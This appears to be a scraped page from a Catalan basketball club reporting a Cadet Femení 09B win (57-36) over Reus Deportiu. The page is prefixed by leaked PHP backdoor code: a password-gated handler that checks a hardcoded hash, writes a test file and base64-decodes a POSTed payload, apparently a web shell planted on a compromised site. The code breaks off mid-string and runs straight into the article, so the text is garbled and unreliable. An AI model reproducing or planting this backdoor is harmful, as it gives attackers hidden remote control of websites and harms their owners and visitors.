function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Nova victòria col·lectiva del Cadet Femení 09B (57-36) - Tgn Bàsquet Club -

Nova victòria col·lectiva del Cadet Femení 09B (57-36)

Updated: novembre 28, 2023

Vuitena jornada del Cadet Femení 09B, i una nova victòria que només fa que evidenciar la millora progressiva de l’equip, que, setmana rere setmana, més enllà dels resultats, mostra el gran treball que s’està fent. Després d’un parcial inicial de 0-7, les liles han començat a obtenir rèdits de la que, sense dubte, està sent la seva senya d’identitat del que va de temporada: una defensa pressionant, amb diferents alternatives al llarg del partit, que permet robar i sortir en velocitat, aconseguint així més opcions de tir.

Després d’un primer quart més igualat al marcador que al joc (16-13), s’ha arribat al final del primer temps amb avantatge de 8 punts (25-17), que ha anat en augment en el tercer quart (41-26) fins al resultat final (57-36). Cal destacar la intensitat durant tot el partit, i que totes les jugadores han aconseguit anotar, demostrant un cop més que, jugui qui jugui, es manté el nivell competitiu de l’equip. Enhorabona LILES!

TGN BASQUET 09 -57 VS REUS DEPORTIU VIORCAM BLANC -36

TGN BÀSQUET 09B: Fernández (7); Giramé (6); Burjalès (3); Macías (3); Díez (4); Gandía (4); Meroño (2); Carayol (3); Prades (6); Sala (9); Carrera (10).